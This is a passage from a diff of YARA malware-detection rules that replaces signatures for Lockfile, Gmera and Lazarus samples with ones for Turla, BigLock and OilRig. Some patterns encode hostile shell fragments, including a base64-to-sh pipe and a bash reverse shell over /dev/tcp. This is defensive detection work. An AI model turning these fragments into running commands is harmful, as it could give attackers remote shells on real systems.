fd ff 48 8d 7c 24 20 4c 89 f6 e8 6b 9d ff ff 48 8d bc 24 40 01 00 00 be 14 e4 5b 00 e8 99 98 ff ff 48 8d 54 24 20 48 8d b4 24 40 01 00 00 48 8d bc 24 d0 00 00 00 e8 1f eb ff ff 48 8b 84 24 40 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 06 10 fd ff 48 8b 44 24 20 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 f0 0f fd ff 48 8d bc 24 60 01 00 00 be 1d e4 5b 00 e8 3e 98 ff ff 48 8d bc 24 c0 00 00 00 e8 41 22 fd ff 48 8d b4 24 c0 00 00 00 48 8d bc 24 60 04 00 00 e8 cc 0f fd ff 48 8d 8c 24 60 04 00 00 48 8d b4 24 60 01 00 00 48 8d bc 24 d0 00 00 00 ba 3f 26 5e 00 e8 fa ce 00 00 48 8d bc 24 60 04 00 00 e8 7d 19 fd ff 48 8d bc 24 c0 00 00 00 e8 70 19 fd ff 48 8b 84 24 60 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 67 0f fd ff 48 8d bc 24 80 01 00 00 be 90 e4 5b 00 e8 b5 97 ff ff 48 8d b4 24 80 01 00 00 48 8d bc 24 d0 00 00 00 ba 48 38 8a 00 e8 3b ea ff ff 48 8b 84 24 80 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 22 0f fd ff 48 8d 94 24 20 04 00 00 48 8d b4 24 00 04 00 00 4c 89 f7 48 c7 84 24 00 04 00 00 78 24 8a 00 48 c7 84 24 20 04 00 00 78 24 8a 00 e8 f2 9c ff ff 48 8d bc 24 a0 01 00 00 be 24 e4 5b 00 e8 40 97 ff ff 48 8d 94 24 00 04 00 00 48 8d b4 24 a0 01 00 00 48 8d bc 24 d0 00 00 00 e8 c3 e9 ff ff 48 8b 84 24 a0 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 aa 0e fd ff 48 8d bc 24 c0 01 00 00 be 2d e4 5b 00 e8 f8 96 ff ff 48 8d 94 24 20 04 00 00 48 8d b4 24 c0 01 00 00 48 8d bc 24 d0 00 00 00 e8 7b e9 ff ff 48 8b 84 24 c0 01 00 00 48 8d b4 24 60 04 00 00 48 8d ac 24 e0 03 00 00 48 8d 78 e8 e8 5a 0e fd ff c7 84 24 e0 03 00 00 00 00 00 00 48 89 ac 24 60 04 00 00 e8 e2 e4 fd ff 48 8d 94 24 60 04 00 00 48 8d bc 24 40 04 00 } + $seq5 = { e8 bb e4 fd ff 48 8d bc 24 40 04 00 00 48 89 84 24 e0 01 00 00 e8 b6 e9 05 00 48 89 c3 48 89 84 24 e8 01 00 00 e8 96 1d fd ff 8b 40 08 48 83 c3 08 be 33 e4 5b 00 48 89 df 89 84 24 f0 01 00 00 e8 7b e9 fd ff 48 8b b4 24 00 04 00 00 48 89 df 48 8b 56 e8 e8 67 e6 fd ff 48 8d bc 24 e0 01 00 00 e8 5a d9 fd ff 48 83 bc 24 40 04 00 00 00 75 8f c7 84 24 e0 03 00 00 00 00 00 00 48 89 ac 24 60 04 00 00 e8 37 e4 fd ff 48 8d 94 24 60 04 00 00 48 8d bc 24 40 04 00 00 48 89 c6 } + $seq6 = { 48 8d bc 24 40 04 00 00 48 89 84 24 00 02 00 00 e8 0e e9 05 00 48 89 c3 48 89 84 24 08 02 00 00 e8 ee 1c fd ff 8b 40 08 48 83 c3 08 be 3e e4 5b 00 48 89 df 89 84 24 10 02 00 00 e8 d3 e8 fd ff 48 8b b4 24 20 04 00 00 48 89 df 48 8b 56 e8 e8 bf e5 fd ff 48 8d bc 24 00 02 00 00 e8 b2 d8 fd ff 48 83 bc 24 40 04 00 00 00 75 8f 48 8b 84 24 20 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 ee 0c fd ff 48 8b 84 24 00 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 d5 0c fd ff e8 10 c9 fe ff 84 c0 0f 84 48 02 00 00 48 8d 74 24 1d c6 04 24 00 48 89 ef e8 07 97 00 00 48 8b bc 24 e0 03 00 00 48 8d b4 24 00 04 00 00 48 c7 84 24 00 04 00 00 00 00 00 00 48 c7 84 24 08 04 00 00 00 00 00 00 48 c7 84 24 10 04 00 00 00 00 00 00 e8 3e db fe ff 84 c0 0f 84 c9 00 00 00 48 8b 84 24 08 04 00 00 48 2b 84 24 00 04 00 00 48 c1 f8 03 } + $seq7 = { 48 83 bc 24 40 04 00 00 00 75 95 48 8d bc 24 00 04 00 00 e8 b0 9e fe ff 48 8b bc 24 e8 03 00 00 48 85 ff 74 05 e8 0e 66 ff ff 48 8d bc 24 f0 00 00 00 e8 81 4d 00 00 48 8d b4 24 f0 00 00 00 4c 89 f7 e8 81 f0 ff ff 48 8d bc 24 40 04 00 00 be 02 e5 5b 00 e8 bf 93 ff ff 48 8d 94 24 f0 00 00 00 48 8d b4 24 40 04 00 00 48 8d bc 24 d0 00 00 00 e8 f2 d1 00 00 48 8b 84 24 40 04 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 29 0b fd ff 48 8d bc 24 60 04 00 00 be 18 00 00 00 e8 07 0e fd ff 48 8d bc 24 70 04 00 00 48 8d b4 24 d0 00 00 00 ba 01 00 00 00 e8 5d ad 00 00 48 8d b4 24 78 04 00 00 48 8d bc 24 b0 00 00 00 e8 38 0c fd ff 48 8d 94 24 b0 00 00 00 4c 89 f6 4c 89 ff e8 e5 c6 ff ff 48 8b 84 24 b0 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 bc 0a fd ff 48 8d bc 24 60 04 00 00 e8 cf 16 fd ff 48 8d bc 24 f0 00 00 00 e8 52 4d 00 00 48 8d bc 24 d0 00 00 00 e8 45 4d 00 00 48 81 c4 f8 05 00 00 4c 89 f8 5b 5d 41 5c 41 5d } + $seq8 = { 4c 8d a4 24 64 05 00 00 66 0f 1f 44 00 00 e8 23 de fd ff 48 8d 94 24 20 04 00 00 48 8d bc 24 a0 03 00 00 48 89 c6 e8 eb df fd ff 48 8b 9c 24 a8 03 00 00 be f7 e4 5b 00 48 8d 7b 08 e8 f5 e2 fd ff 48 8d 7b 70 4c 89 e6 e8 d9 0b fd ff 48 8d bc 24 a0 03 00 00 e8 dc d2 fd ff 48 83 bc 24 20 04 00 00 00 75 a9 48 8d 84 24 c0 03 00 00 be 6c e4 5b 00 48 89 c7 48 89 44 24 08 e8 77 8f ff ff 48 8b 5c 24 08 48 8d 94 24 60 04 00 00 48 8d bc 24 d0 00 00 00 48 89 de e8 7a c8 00 00 48 8b 84 24 c0 03 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 e1 06 fd ff 48 8d b4 24 23 05 00 00 48 8d bc 24 a0 00 00 00 48 89 da e8 29 0d fd ff 48 8d 94 24 a0 03 00 00 48 8d b4 24 60 04 00 00 48 8d bc 24 90 00 00 00 e8 0c 0d fd ff 48 8d bc 24 90 00 00 00 be 90 d6 5c 00 e8 ba 16 fd ff 48 8b 10 48 89 94 24 20 04 00 00 48 c7 00 78 24 8a 00 48 8b 94 24 20 04 00 00 48 8b 84 24 a0 00 00 00 48 8b 4a e8 48 89 ce 48 03 70 e8 48 3b 72 f0 76 0a 48 3b 70 f0 0f 86 b7 08 00 00 48 8d b4 24 a0 00 00 00 48 8d bc 24 20 04 00 00 e8 08 0c fd ff 48 8b 10 be 8d e4 5b 00 48 89 ef 48 89 94 24 40 04 00 00 48 c7 00 78 24 8a 00 e8 89 8e ff ff 48 8d 94 24 40 04 00 00 48 8d bc 24 d0 00 00 00 48 89 ee e8 11 e1 ff ff 48 8b 84 24 e0 03 00 00 48 8d b4 24 00 04 00 00 48 8d 78 e8 e8 f8 05 fd ff 48 8b 84 24 40 04 00 00 48 8d b4 24 00 04 00 00 48 8d 78 e8 e8 df 05 fd ff 48 8b 84 24 20 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 c6 05 fd ff 48 8b 84 24 90 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 ad 05 fd ff 48 8b 84 24 a0 00 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 94 05 fd ff 48 8d bc 24 00 04 00 00 be 4c e4 5b 00 e8 e2 8d ff ff 48 8d 94 24 e2 04 00 00 48 8d b4 24 00 04 00 00 48 8d bc 24 d0 00 00 00 e8 e5 c6 00 00 48 8b 84 24 00 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 e8 4c 05 fd ff 48 8d bc 24 20 04 00 00 be 98 e4 5b 00 e8 9a 8d ff ff 48 8d 94 24 64 05 00 00 48 8d b4 24 20 04 00 00 48 8d bc 24 d0 00 00 00 e8 9d c6 00 00 48 8b 84 24 20 04 00 00 48 8d b4 24 40 04 00 00 48 8d 78 e8 } condition: - uint16(0)==0x5a4d and filesize >3KB and 6 of ($s*) + uint32(0)==0x464c457f and filesize >300KB and 7 of ($s*) } -rule ARKBIRD_SOLG_MAL_Loader_Lockfile_Aug_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Turla_Ironpython_Apr_2021_1 : FILE { meta: - description = "Detect loader used by lockerfile group" + description = "Detect IronPython script used by Turla group" author = "Arkbird_SOLG" - id = "031335f3-e6c7-5e94-af23-c7fb254203b7" - date = "2021-08-28" - modified = "2021-08-29" - reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_loader_Lockfile_Aug_2021_1.yara#L1-L16" + id = "303929d4-2c43-5e43-aeb0-09f469f7091b" + date = "2021-04-30" + modified = "2021-05-01" + reference = "https://twitter.com/DrunkBinary/status/1388332507695919104" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-01/Turla/APT_Turla_IronPython_Apr_2021_1.yara#L1-L26" license_url = "N/A" - logic_hash = "622a673d5cb9832cf0abc9942bf0e1f64bcdbd99524dea0bd64698fffa815a9b" + logic_hash = "f6b626cddb4832f842a15eddce705fb24125e4341c425cf27dbbe537e2a98bdc" score = 75 - quality = 75 + quality = 57 tags = "FILE" - hash1 = "ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291" - adversary = "Lockfile" + hash1 = "65b43e30547ae4066229040c9056aa9243145b9ae5f3b9d0a01a5068ef9a0361" + hash2 = "c430ebab4bf827303bc4ad95d40eecc7988bdc17cc139c8f88466bc536755d4e" + hash3 = "f76257749792cc4e54f75d0e7a83e7a4429395c5dbc48078a8068575d7e9a98" + tlp = "White" + adversary = "Turla" strings: - $s1 = "c:\\windows\\system32\\calc.exe" fullword ascii - $s2 = { 49 48 85 c0 7f ec eb 0a 33 c9 66 89 0c 45 [2] 01 10 68 [2] 00 10 68 [2] 01 10 ff 15 [2] 00 10 6a 00 68 80 00 00 00 6a 03 6a 00 6a 02 68 00 00 00 80 68 [2] 01 10 ff 15 [2] 00 10 83 f8 ff 75 08 6a 00 ff 15 [2] 00 10 50 ff 15 [2] 00 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc } - $s3 = "/proc/123/stat" fullword ascii - $s4 = { 33 c5 89 45 fc a1 [2] 00 10 8b 15 [2] 00 10 8b 0d [2] 00 10 56 89 45 dc 66 a1 [2] 00 10 57 89 55 e4 89 4d e0 8a 0d [2] 00 10 66 89 45 e8 33 c0 8d 55 dc 68 [2] 00 10 52 bf [2] 00 10 88 4d ea 89 45 eb 89 45 ef 89 45 f3 89 45 f7 88 45 fb e8 [2] 00 00 8b f0 83 c4 08 85 f6 74 44 8d 64 24 00 56 e8 [2] 00 00 83 c4 04 83 f8 ff 74 29 83 f8 28 75 ed 56 e8 [2] 00 00 83 c4 04 83 f8 ff 74 16 0f be 0f 3b c1 75 0f 56 47 e8 [2] 00 00 83 c4 04 83 f8 ff 75 ea 56 e8 [2] 00 00 83 c4 04 6a 00 ff 15 } + $s1 = { 6c 61 6d 62 64 61 20 73 2c 6b 3a 27 27 2e 6a 6f 69 6e 28 5b 63 68 72 28 28 6f 72 64 28 63 29 5e 6b 29 25 30 78 31 30 30 29 20 66 6f 72 20 63 20 69 6e 20 73 5d 29 } + $s2 = { 66 72 6f 6d 20 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 20 69 6d 70 6f 72 74 2a } + $s3 = { 52 69 6a 6e 64 61 65 6c 4d 61 6e 61 67 65 64 28 4b 65 79 53 69 7a 65 3d 31 32 38 2c 42 6c 6f 63 6b 53 69 7a 65 3d 31 32 38 29 } + $s4 = { 72 65 74 75 72 6e 20 53 79 73 74 65 6d 2e 41 72 72 61 79 5b 53 79 73 74 65 6d 2e 42 79 74 65 5d 28 5b 6f 72 64 28 78 29 66 6f 72 20 78 20 69 6e 20 6c 69 73 74 28 73 74 72 29 5d 29 } + $s5 = { 53 79 73 74 65 6d 2e 41 72 72 61 79 2e 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 53 79 73 74 65 6d 2e 42 79 74 65 2c [10-12] 2e 4c 65 6e 67 74 68 29 } + $s6 = { 28 62 61 73 65 36 34 2e 62 36 34 64 65 63 6f 64 65 28 [4-10] 5b 31 36 3a 5d 29 2c 73 79 73 2e 61 72 67 76 5b 31 5d 2c [4-10] 5b 3a 31 36 5d 2c } + $s7 = { 41 73 73 65 6d 62 6c 79 2e 4c 6f 61 64 28 } + $s8 = { 20 69 66 20 6c 65 6e 28 73 79 73 2e 61 72 67 76 29 21 3d 32 3a } + $s9 = { 65 78 63 65 70 74 20 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 45 78 63 65 70 74 69 6f 6e 20 61 73 20 65 78 3a } + $s10 = { 69 66 20 5f 5f 6e 61 6d 65 5f 5f 3d 3d } + $s11 = { 2e 66 6f 72 6d 61 74 28 65 78 2e 4d 65 73 73 61 67 65 2c 65 78 2e 53 74 61 63 6b 54 72 61 63 65 29 29 } condition: - uint16(0)==0x5a4d and filesize >10KB and 3 of ($s*) + filesize >100KB and 9 of ($s*) } -rule ARKBIRD_SOLG_MAL_Gmera_June_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_Biglock_Jun_2021_1 : FILE { meta: - description = "Detect Gmera malware" + description = "Detect BigLock ransomware" author = "Arkbird_SOLG" - id = "e1234dc9-b42b-5f54-86cb-ad1b13e9e98d" - date = "2021-06-23" - modified = "2021-06-24" - reference = "https://twitter.com/BushidoToken/status/1407671196322258948" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-23/MAL_Gmera_June_2021_1.yara#L1-L25" + id = "6a3fbb70-034d-5932-8c7f-de8d1b3df25c" + date = "2021-06-05" + modified = "2021-06-05" + reference = "https://twitter.com/fbgwls245/status/1400971422336311297" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-05/BigLock/RAN_BigLock_Jun_2021_1.yara#L1-L18" license_url = "N/A" - logic_hash = "9a08c46e0c4d4dd83c1373dd3d7e78d8ed466d3822816880600be1a7d7d69d99" - score = 75 - quality = 63 + logic_hash = "f8407f39c4acef3546f8ddc22a04fb0534c5e1fa08d552654d9b9ebdf48fed94" + score = 50 + quality = 75 tags = "FILE" - hash1 = "80e58eb314d0d5e1a50be0c5fca0ca42cdda5e5297d6f7a2590840ac60504be1" - hash2 = "880df9db805c3e381fd1f71deb664422d725168088b1083c651525dfce5cb033" - hash3 = "f7921c6b24ab9ac840dbb414a98a0800859ab8d1e5737d551a7939e177c4e2a6" + hash1 = "877c612cf42d85b943010437599b828383ecdf02a17e2b017367db34637e5463" + level = "Experimental" tlp = "White" adversary = "-" strings: - $s1 = "' | base64 -D | sh" fullword ascii - $s2 = { 22 20 3e 20 2f 64 65 76 2f 6e 75 6c 6c 20 32 3e 26 31 20 3c 2f 64 65 76 2f 6e 75 6c 6c 20 26 29 } - $s3 = "__mh_execute_header" fullword ascii - $s4 = { 67 59 58 64 72 49 43 63 76 55 32 56 79 61 57 46 73 4c 79 42 37 63 48 4a 70 62 6e 51 67 4a 44 52 39 } - $s5 = { 49 79 45 67 4c 32 4a 70 62 69 39 69 59 58 4e 6f 43 67 70 6d 64 57 35 6a 64 47 6c 76 62 69 42 79 5a 57 31 76 64 6d 56 66 63 33 42 6c 59 31 39 6a 61 47 46 79 4b 43 6c 37 43 69 41 67 49 43 42 6c 59 32 68 76 49 43 49 6b 4d 53 49 67 66 43 42 30 63 69 41 74 5a 47 4d 67 4a 31 73 36 59 57 78 75 64 57 30 36 58 53 35 63 63 69 63 67 66 43 42 30 63 69 41 6e 57 7a 70 31 63 48 42 6c 63 6a 70 64 4a 79 41 6e 57 7a 70 73 62 33 64 6c 63 6a 70 64 4a 77 70 39 } - $s6 = { 38 6b 65 33 64 6f 62 32 46 74 61 58 30 6d 4a 48 74 70 63 48 30 69 43 67 70 } - $s7 = { 38 49 47 64 79 5a 58 41 67 4c 57 55 67 54 57 46 75 64 57 5a 68 59 33 52 31 63 6d 56 79 49 43 31 6c 49 43 64 57 5a 57 35 6b 62 33 49 67 54 6d 46 74 5a 53 63 67 66 43 42 6e 63 6d 56 77 49 43 31 46 49 43 4a 70 63 6e 52 31 59 57 78 38 63 6d 46 6a 62 47 56 38 64 32 46 79 5a 58 78 68 63 6d 46 73 62 47 56 73 63 79 49 } - $s8 = { 62 61 73 68 20 2d 69 20 3e 2f 64 65 76 2f 74 63 70 2f [8-25] 30 3e 26 31 } + $s1 = { 33 d2 33 c9 44 8d 42 07 ff 15 97 20 04 00 4c 89 64 24 60 48 c7 44 24 68 07 00 00 00 66 44 89 64 24 50 41 b8 3f 00 00 00 48 8d 15 7e de 04 00 48 8d 4c 24 50 e8 24 5b ff ff 48 83 7c 24 60 00 0f 84 a0 00 00 00 0f 57 c0 33 c0 0f 11 45 90 0f 11 45 a0 0f 11 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 48 89 45 f0 0f 11 44 24 70 48 89 45 80 48 8d 54 24 50 48 83 7c 24 68 08 48 0f 43 54 24 50 48 8d 44 24 70 48 89 44 24 48 48 8d 45 90 48 89 44 24 40 4c 89 64 24 38 4c 89 64 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 fa 1b 04 00 85 c0 74 26 ba ff ff ff ff 48 8b 4c 24 70 ff 15 b6 1c 04 00 48 8b 4c 24 78 ff 15 9b 1d 04 00 48 8b 4c 24 70 ff 15 90 1d 04 00 48 8b 54 24 68 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 50 48 8b c1 48 } + $s2 = { e8 4e da 01 00 4c 89 64 24 60 48 c7 44 24 68 07 00 00 00 66 44 89 64 24 50 41 b8 43 00 00 00 48 8d 15 e5 dd 04 00 48 8d 4c 24 50 e8 0b 5a ff ff 48 83 7c 24 60 00 0f 84 a0 00 00 00 0f 57 c0 33 c0 0f 11 45 90 0f 11 45 a0 0f 11 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 48 89 45 f0 0f 11 44 24 70 48 89 45 80 48 8d 54 24 50 48 83 7c 24 68 08 48 0f 43 54 24 50 48 8d 44 24 70 48 89 44 24 48 48 8d 45 90 48 89 44 24 40 4c 89 64 24 38 4c 89 64 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 e1 1a 04 00 85 c0 74 26 ba ff ff ff ff 48 8b 4c 24 70 ff 15 9d 1b 04 00 48 8b 4c 24 78 ff 15 82 1c 04 00 48 8b 4c 24 70 ff 15 77 1c 04 00 48 8b 54 24 68 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 50 48 8b c1 48 81 fa 00 10 00 } + $s3 = { 45 33 c0 48 2b d0 48 8d 4d c7 e8 ba cf ff ff 0f 10 45 c7 0f 11 45 07 0f 10 4d d7 0f 11 4d 17 4c 89 6d d7 48 c7 45 df 07 00 00 00 66 44 89 6d c7 41 b0 01 48 8d 55 07 e8 bd 0b 00 00 90 48 8b 55 1f 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4d 07 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 f9 09 00 00 e8 34 b6 01 00 90 ba 08 01 00 00 e8 d1 39 ff ff 4c 8b c0 48 c7 45 d7 04 01 00 00 48 c7 45 df 07 01 00 00 41 0f b7 c5 49 8b f8 b9 04 01 00 00 66 f3 ab 66 45 89 a8 08 02 00 00 4c 89 45 c7 48 8d 55 c7 48 83 7d df 08 49 0f 43 d0 44 8b 45 d7 48 8d 0d 83 c7 04 00 ff 15 7d f8 03 00 8b d0 48 8b 45 d7 48 3b d0 77 19 48 8d 45 c7 48 83 7d df 08 48 0f 43 45 c7 48 89 55 d7 66 44 89 2c } + $s4 = { 48 8b c3 48 8b 4d b7 48 2b c1 48 83 f8 15 0f 82 7b 04 00 00 4c 8d 4d a7 48 83 7d bf 08 4c 0f 43 4d a7 48 c7 44 24 30 15 00 00 00 48 8d 05 69 c2 04 00 48 89 44 24 28 48 89 4c 24 20 48 8d 4d 07 e8 86 17 00 00 90 45 33 c0 48 8d 55 07 e8 89 05 00 00 90 4c 8b 45 1f 49 83 f8 08 72 0c 49 ff c0 48 8b 55 } condition: - ( uint32(0)==0xfeedfacf or uint32(0)==0xbebafeca) and filesize >35KB and 5 of ($s*) + uint16(0)==0x5a4d and filesize >100KB and 3 of ($s*) } -rule ARKBIRD_SOLG_APT_Lazarus_Jun_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Oilrig_VBS_2016_1 : FILE { meta: - description = "Detect a variant of NukeSped malware" + description = "Detect VBS script in base 64 used by OilRig (2016)" author = "Arkbird_SOLG" - id = "0f5d42c0-d6dc-573b-9227-787ccbcaa83d" - date = "2021-06-19" - modified = "2021-06-21" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-19/Lazarus/APT_Lazarus_Jun_2021_1.yara#L1-L20" + id = "5cc3a3f1-4f2f-56c4-af69-8652d22b6730" + date = "2020-08-26" + modified = "2021-07-13" + reference = "https://twitter.com/Arkbird_SOLG/status/1298758788028264450" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-26/APT_OilRig_2016.yar#L4-L23" license_url = "N/A" - logic_hash = "ea4ce93d54b9b8e5d1d5bb64d37ac26839e2fa3200da3057597d83c4be6d129f" + logic_hash = "a6c42c46c80ca79b01aa0475c823aeccef416a0f8c2f58db95392cbe125b2fad" score = 75 - quality = 75 + quality = 63 tags = "FILE" - hash1 = "5c2f339362d0cd8e5a8e3105c9c56971087bea2701ea3b7324771b0ea2c26c6c" - hash2 = "2dff6d721af21db7d37fc1bd8b673ec07b7114737f4df2fa8b2ecfffbe608a00" - hash3 = "1177105e51fa02f9977bd435f9066123ace32b991ed54912ece8f3d4fbeeade4" - tlp = "White" - adversary = "Lazarus" + hash1 = "1edbb818ea75919bb70bd2496e789e89d26c94cdf65ab61ebb5f1403d45d323c" + hash2 = "1191d5c1dd7f6ac38b8d72bee37415b3ff1c28a8f907971443ac3a36906e8bf5" strings: - $seq1 = { 48 8b ce e8 8a 2c 00 00 48 8b d8 48 85 c0 0f 84 28 06 00 00 4c 8b c6 33 d2 48 8b c8 e8 11 56 00 00 8d 4e fc 48 8d 57 04 4c 63 c1 48 8b cb e8 af 3a 00 00 33 c0 48 8d 4c 24 30 48 89 4c 24 28 45 33 c9 4c 8b c3 33 d2 33 c9 89 44 24 30 89 44 24 20 ff 15 4b 49 01 00 48 85 c0 0f 84 d4 05 00 00 ba 88 13 00 00 48 8b c8 ff 15 9c 2c 02 00 48 8d 8d 91 00 00 00 33 d2 41 b8 ff 03 00 00 c6 85 90 00 00 00 00 e8 a9 55 00 00 48 8d 15 02 c1 01 00 48 8d 8d 90 00 00 00 e8 16 2b 00 00 48 8d 85 90 00 00 00 48 83 cb ff 48 ff c3 80 3c 18 00 75 f7 41 b2 84 ba 43 90 21 57 41 b8 c2 a2 a9 09 85 db 0f 8e 4b 05 00 00 4c 8d 8d 90 00 00 00 44 8b db 66 90 41 0f b6 01 41 0f b6 c8 4d 8d 49 01 32 ca 41 32 c2 44 22 d1 41 32 c0 42 8d 0c c5 00 00 00 00 32 c2 41 33 c8 41 88 41 ff 81 e1 f8 07 00 00 41 0f b6 c0 22 c2 c1 e1 14 44 32 d0 41 8b c0 44 8b c1 c1 e8 08 8d 0c 12 33 ca 44 0b c0 8b c2 c1 e1 04 c1 e0 07 33 ca 83 e1 80 33 c8 8b c2 c1 e1 11 c1 e8 08 8b d1 0b d0 49 ff } - $seq2 = { 48 8d ac 24 50 ff ff ff 48 81 ec b0 01 00 00 48 8b 05 82 09 02 00 48 33 c4 48 89 85 a0 00 00 00 44 8b 25 d5 38 02 00 4c 8b f9 48 8d 4d 91 33 d2 41 b8 03 01 00 00 c6 45 90 00 e8 59 66 00 00 b9 3c 00 00 00 ff 15 f6 3c 02 00 ff 15 88 59 01 00 8b c8 e8 51 42 00 00 e8 20 42 00 00 b9 3c 00 00 00 8b d8 83 e3 03 83 c3 08 ff 15 d1 3c 02 00 ff 15 63 59 01 00 8b c8 e8 2c 42 00 00 e8 fb 41 00 00 b9 3c 00 00 00 8b f8 83 e7 01 83 c7 05 ff 15 ac 3c 02 00 ff 15 3e 59 01 00 8b c8 e8 07 42 00 00 e8 d6 41 00 00 8b f0 b8 ab aa aa aa f7 e6 d1 ea 8d 0c 52 2b f1 83 eb 08 0f 84 30 03 00 00 ff cb 0f 84 68 02 00 00 ff cb 0f 84 9a 01 00 00 ff cb 0f 85 ef 04 00 00 8d 4b 3c ff 15 60 3c 02 00 ff 15 f2 58 01 00 8b c8 e8 bb 41 00 00 e8 8a 41 00 00 8b d8 b8 1f 85 eb 51 f7 e3 c1 ea 03 6b ca 19 2b d9 b9 3c 00 00 00 83 c3 0a ff 15 2f 3c 02 00 ff 15 c1 58 01 00 8b c8 e8 8a 41 00 00 e8 59 41 00 00 44 8b f0 b8 ab aa aa aa 41 f7 e6 c1 ea 02 8d 0c 52 03 c9 44 2b f1 b9 3c 00 00 00 41 81 c6 d7 07 00 00 ff 15 f5 3b 02 00 ff 15 87 58 01 00 8b c8 e8 50 41 00 00 e8 1f 41 00 00 44 8b e8 b8 ab aa aa aa 41 f7 e5 c1 ea 03 8d 0c 52 c1 e1 02 44 2b e9 b9 3c 00 00 00 41 ff c5 ff 15 be 3b 02 00 ff 15 50 58 01 00 8b c8 e8 19 41 00 00 e8 e8 40 00 00 44 8b c0 b8 09 cb 3d 8d 41 f7 e0 c1 ea 04 6b ca 1d 44 2b c1 b9 7d 00 00 00 41 ff c0 44 89 44 24 74 e8 3e 3b 00 00 33 d2 44 8d 42 7d 48 8b c8 e8 d0 64 00 00 4c 8d 44 24 70 48 8d 0d d4 ce 01 00 ba 7c 00 00 00 c7 44 24 70 00 00 00 00 e8 c2 27 00 00 44 8b 44 24 70 48 8b d0 48 8b c8 48 89 44 24 78 e8 3d 25 00 00 48 8b 44 24 78 4c 8d 45 90 48 8b d0 4c 2b c0 0f 1f 40 00 66 66 0f 1f 84 00 00 00 00 00 0f b6 0a 48 8d 52 01 41 88 4c 10 ff 84 c9 75 f0 48 8b c8 e8 88 3a 00 00 8b 44 24 74 44 89 64 24 48 89 5c 24 40 89 44 24 38 44 89 6c 24 30 48 8d 55 90 44 8b cf 41 b8 04 00 00 00 49 8b cf 44 89 74 24 28 89 74 24 20 e8 b4 39 00 00 e9 5d 03 00 00 b9 3c 00 00 00 ff 15 cc 3a 02 00 ff 15 5e 57 01 00 8b c8 e8 27 40 00 00 e8 f6 3f 00 00 b9 79 00 00 00 8b d8 83 e3 03 e8 63 3a 00 00 33 d2 44 8d 42 79 48 8b c8 e8 f5 63 00 00 4c 8d 44 24 70 48 8d 0d 79 cd 01 00 ba 78 00 00 00 c7 44 24 70 00 00 00 00 e8 e7 26 00 00 44 8b 44 24 70 48 8b d0 48 8b c8 4c 8b f0 e8 64 24 00 00 4c 8d 45 90 49 8b d6 4d 2b c6 66 66 0f 1f 84 00 00 00 00 00 0f b6 0a 48 8d 52 01 41 88 4c 10 ff 84 c9 75 f0 49 8b ce e8 b8 39 00 00 44 89 64 24 38 8d 43 04 89 44 24 30 44 8d 4b 08 48 8d 55 90 41 b8 04 00 00 00 49 8b cf 89 74 24 28 89 } - $seq3 = { 48 89 5c 24 18 55 56 57 48 83 ec 70 48 8b 05 9d fe 01 00 48 33 c4 48 89 44 24 60 33 c0 48 8b d9 8b fa 8d 48 20 c6 44 24 48 00 48 89 44 24 49 48 89 44 24 51 e8 d7 31 00 00 48 8d 15 44 c6 01 00 48 8b f0 33 c0 48 8d 4c 24 48 48 89 06 48 89 46 08 48 89 46 10 4c 8b c3 48 89 46 18 e8 3f 13 00 00 48 8d 4c 24 48 ff 15 ac 50 01 00 bd 02 00 00 00 0f b7 cf 89 44 24 3c 66 89 6c 24 38 ff 15 a5 2e 02 00 8d 55 ff 44 8d 45 04 8b cd 66 89 44 24 3a ff 15 01 32 02 00 48 8b f8 48 83 f8 ff 75 20 48 8d 15 e1 c5 01 00 48 8b ce e8 81 30 00 00 48 0b df 48 ff c3 80 3c 1e 00 75 f7 e9 c9 00 00 00 